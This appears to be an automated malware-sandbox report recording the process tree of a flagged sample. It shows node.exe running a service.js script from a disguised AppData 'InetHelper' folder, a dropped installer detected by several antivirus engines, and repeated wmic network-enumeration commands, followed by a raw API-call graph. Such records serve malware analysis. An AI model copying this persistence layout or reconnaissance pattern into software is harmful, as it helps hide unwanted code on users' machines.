                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                            Start time:11:09:00
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:11:09:01
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wscsu.exe /S /VERPOSTFIX=bt
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:7'055'674 bytes
                                                                                                                                                                                                            MD5 hash:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                                                                                            • Detection: 77%, Virustotal
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:11:09:05
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0xfe0000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:11:09:05
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:11:09:07
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                            Start time:11:09:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:11:09:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                            Start time:11:09:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:11:09:10
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:11:09:10
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:11:09:22
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:11:09:23
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:11:09:24
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                            Start time:11:09:24
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                            Start time:11:09:38
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                            Start time:11:09:38
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                            Start time:11:09:40
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                            Start time:11:09:40
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                            Start time:11:09:53
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                            Start time:11:09:53
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                            Start time:11:09:55
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                            Start time:11:09:55
Start date:01/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:11:10:08
Start date:01/05/2024
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Imagebase:0xc40000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:51
Start time:11:10:08
Start date:01/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage:14.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:8.4%
Total number of Nodes:2000
Total number of Limit Nodes:50
bc0a1d 18742->18751 18746 bc03a8 18745->18746 18747 bc1458 18745->18747 18748 bc1472 18747->18748 18750 bc147a 18747->18750 18748->18746 18750->18748 18754 bc4bfb 18750->18754 18752 bc0914 15 API calls 18751->18752 18753 bc0a2e 18752->18753 18753->18745 18756 bc4c70 18754->18756 18766 bc3cd2 18756->18766 18758 bc4d33 18758->18748 18759 bb45bc SetEvent 18760 bc4cfa 18759->18760 18760->18758 18761 bb45bc SetEvent 18760->18761 18762 bc4d08 18761->18762 18762->18758 18771 bc49b3 18762->18771 18789 bc3cb4 18766->18789 18769 bc3cb4 ResetEvent 18770 bc3ce9 18769->18770 18770->18758 18770->18759 18772 bc49d0 18771->18772 18792 bc4944 18772->18792 18775 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18776 bc49ea 18775->18776 18776->18758 18777 bc3d65 18776->18777 18778 bc3d76 18777->18778 18779 bc3d92 18777->18779 18781 bb45bc SetEvent 18778->18781 18780 bb457f FindCloseChangeNotification 18779->18780 18782 bc3d99 18780->18782 18783 bc3d7d 18781->18783 18784 bb45bc SetEvent 18783->18784 18785 bc3d84 18784->18785 18786 bb45a0 2 API calls 18785->18786 18787 bc3d8b 18786->18787 18788 bb457f FindCloseChangeNotification 18787->18788 18788->18779 18790 bc3cb9 ResetEvent 18789->18790 18791 bc3cc5 18789->18791 18790->18791 18791->18769 18791->18770 18802 bc3ec5 18792->18802 18795 bc49b0 18795->18775 18796 bb45bc SetEvent 18797 bc4972 18796->18797 18798 bb45bc SetEvent 18797->18798 18799 bc497d EnterCriticalSection 18798->18799 18800 bc49a6 LeaveCriticalSection 18799->18800 18801 bc4993 18799->18801 18800->18795 18801->18800 18803 bb45a0 2 API calls 18802->18803 18805 bc3ee5 __InternalCxxFrameHandler 18803->18805 18804 bc493a 18804->18795 18804->18796 18805->18804 18806 bb45bc SetEvent 18805->18806 18808 bc439e EnterCriticalSection 18805->18808 18809 bc43d4 LeaveCriticalSection 18805->18809 18811 bc3da3 EnterCriticalSection LeaveCriticalSection 18805->18811 18812 bc3e6f EnterCriticalSection LeaveCriticalSection 18805->18812 18813 bb45a0 WaitForSingleObject 
GetLastError 18805->18813 18814 bc3cef 18805->18814 18821 bc3c4b EnterCriticalSection 18805->18821 18806->18805 18808->18805 18809->18805 18811->18805 18812->18805 18813->18805 18815 bc3cd2 ResetEvent 18814->18815 18816 bc3cf8 18815->18816 18817 bd04b7 48 API calls 18816->18817 18820 bc3d27 18816->18820 18818 bc3d18 18817->18818 18818->18820 18824 bb456e GetLastError 18818->18824 18820->18805 18822 bc3c89 18821->18822 18823 bc3ca1 LeaveCriticalSection 18821->18823 18822->18823 18823->18805 18824->18820 18825 bc5ef4 18828 bc5e3b 18825->18828 18827 bc5efc 18829 bc5e80 18828->18829 18830 bc5e73 DestroyWindow 18828->18830 18833 bc5cbd DeleteCriticalSection 18829->18833 18830->18829 18832 bc5e98 18832->18827 18834 bb457f FindCloseChangeNotification 18833->18834 18835 bc5cd2 18834->18835 18835->18832 18836 bc4e95 18837 bc4eac 18836->18837 18838 bc4ea5 18836->18838 18840 bc4ebf 18838->18840 18841 bc4ef9 18840->18841 18844 bc4f14 18841->18844 18845 bc4f3c 18844->18845 18846 bc4f42 VirtualFree 18845->18846 18847 bc4f01 18845->18847 18846->18845 18847->18837 18848 bb7bf0 18849 bb45bc SetEvent 18848->18849 18850 bb7c0c GetDlgItem 18849->18850 18851 bb7c43 SetTimer 18850->18851 18852 bb7c22 LoadIconA SendMessageA 18850->18852 18857 bb7b3e 18851->18857 18852->18851 18854 bb7c5e 18866 bb7fb2 18854->18866 18858 bb7b4a 18857->18858 18859 bb7b58 SetWindowTextW 18858->18859 18860 bb7b63 18858->18860 18862 bb7b8f 18859->18862 18861 bb16dc 16 API calls 18860->18861 18863 bb7b6b 18861->18863 18862->18854 18864 bb2037 19 API calls 18863->18864 18865 bb7b7c SetWindowTextA 18864->18865 18865->18862 18867 bb7fbb PostMessageA 18866->18867 18868 bb7c65 18866->18868 18867->18868 18869 bc6151 18872 bc610b 18869->18872 18871 bc615a 18873 bc6117 __EH_prolog3_catch 18872->18873 18878 bc5f16 18873->18878 18875 bc6130 18913 bc5cf2 18875->18913 18877 bc6138 18877->18871 18879 bc5f25 18878->18879 18880 bb16b8 16 API calls 18879->18880 18881 bc5f37 18880->18881 18882 bb3138 55 API calls 18881->18882 
18883 bc5f4a 18882->18883 18884 bc5f6d 18883->18884 18885 bc5f4e 18883->18885 18918 bb4a88 18884->18918 18886 bb190a 16 API calls 18885->18886 18912 bc5f5e 18886->18912 18889 bb17ef 16 API calls 18890 bc5fb8 18889->18890 18922 bb64ab 18890->18922 18892 bc5fd6 18893 bc5ff5 18892->18893 18894 bc5fe0 18892->18894 18896 bb1759 16 API calls 18893->18896 18895 bb190a 16 API calls 18894->18895 18895->18912 18897 bc6001 18896->18897 18942 bb3784 18897->18942 18901 bc6017 18902 bc601b 18901->18902 18903 bc6064 18901->18903 18905 bb16dc 16 API calls 18902->18905 18970 bb1716 18903->18970 18907 bc6028 18905->18907 18962 bb69dc 18907->18962 18910 bc603b 18912->18875 18914 bb45a0 2 API calls 18913->18914 18915 bc5d1f 18914->18915 18916 bc5d39 18915->18916 18917 bc5d25 PostMessageA 18915->18917 18916->18877 18917->18916 18919 bb4a9c 18918->18919 18920 bb16b8 16 API calls 18919->18920 18921 bb4ab9 18920->18921 18921->18889 18923 bb64b7 18922->18923 18924 bcc0bb 16 API calls 18923->18924 18925 bb64cc 18924->18925 18981 bb4864 18925->18981 18927 bb64da 18928 bb16b8 16 API calls 18927->18928 18929 bb6505 18928->18929 18930 bb16b8 16 API calls 18929->18930 18931 bb6511 18930->18931 18932 bb6541 18931->18932 18989 bb2b88 18931->18989 18937 bb6547 18932->18937 19006 bb5e98 18932->19006 18937->18892 18938 bb6569 18938->18937 18939 bb1614 16 API calls 18938->18939 18940 bb1d74 16 API calls 18938->18940 18941 bb1d35 16 API calls 18938->18941 18939->18938 18940->18938 18941->18938 18943 bb378b 18942->18943 18944 bb37a5 18942->18944 18943->18944 18945 bb12c1 16 API calls 18943->18945 18946 bb26ef 18944->18946 18945->18944 18947 bb26fb 18946->18947 18948 bb30f3 22 API calls 18947->18948 18949 bb2702 18948->18949 18950 bb16dc 16 API calls 18949->18950 18954 bb270b 18949->18954 18951 bb274c 18950->18951 18952 bb2779 18951->18952 18951->18954 18953 bb1759 16 API calls 18952->18953 18956 bb2790 18953->18956 18954->18901 18957 bb2798 GetLastError 18956->18957 18958 bb27e9 18956->18958 18959 
